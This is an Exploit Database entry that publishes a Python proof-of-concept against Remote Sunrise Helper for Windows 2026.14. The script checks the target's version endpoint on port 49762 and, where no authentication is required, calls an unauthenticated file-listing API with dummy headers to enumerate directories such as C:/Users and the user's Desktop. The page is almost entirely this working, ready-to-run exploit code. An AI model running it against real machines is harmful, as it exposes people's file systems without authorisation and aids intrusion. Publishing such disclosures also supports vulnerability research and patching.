[local] Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing EDB-ID: 52566 CVE: N/A EDB Verified: Author: CHOKRI HAMMEDI Type: LOCAL Exploit:   /   Platform: WINDOWS Date: 2026-05-15 Vulnerable App: #!/usr/bin/env python3 # Exploit Title: Remote Sunrise Helper for Windows 2026.14 - Unauthenticated File/Directory Listing # Date: 2026-04-20 # Exploit Author: Chokri Hammedi # Software: https://rs.ltd/latest.php?os=win # Vendor: https://rs.ltd/ # Version: 2026.14 # Tested on: Windows 10 / Windows 11 import requests, json, sys, urllib3 from urllib.parse import quote urllib3.disable_warnings() if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [path]") print(f"Example: {sys.argv[0]} 192.168.1.103") print(f"Example: {sys.argv[0]} 192.168.1.103 'C:/Users'") print(f"Example: {sys.argv[0]} 192.168.1.103 '%USERPROFILE%/Desktop'") sys.exit(1) target = sys.argv[1] path = sys.argv[2] if len(sys.argv) > 2 else "" url = f"https://{target}:49762" headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"} r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5) data = r.json() if data.get("requires.auth") == False: if path: encoded = quote(path, safe='') r = requests.get(f"{url}/api/listFiles={encoded}", headers=headers, verify=False) else: r = requests.get(f"{url}/api/listFiles", headers=headers, verify=False) print(json.dumps(r.json(), indent=2)) else: print("[*] Not vulnerable - authentication required") Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services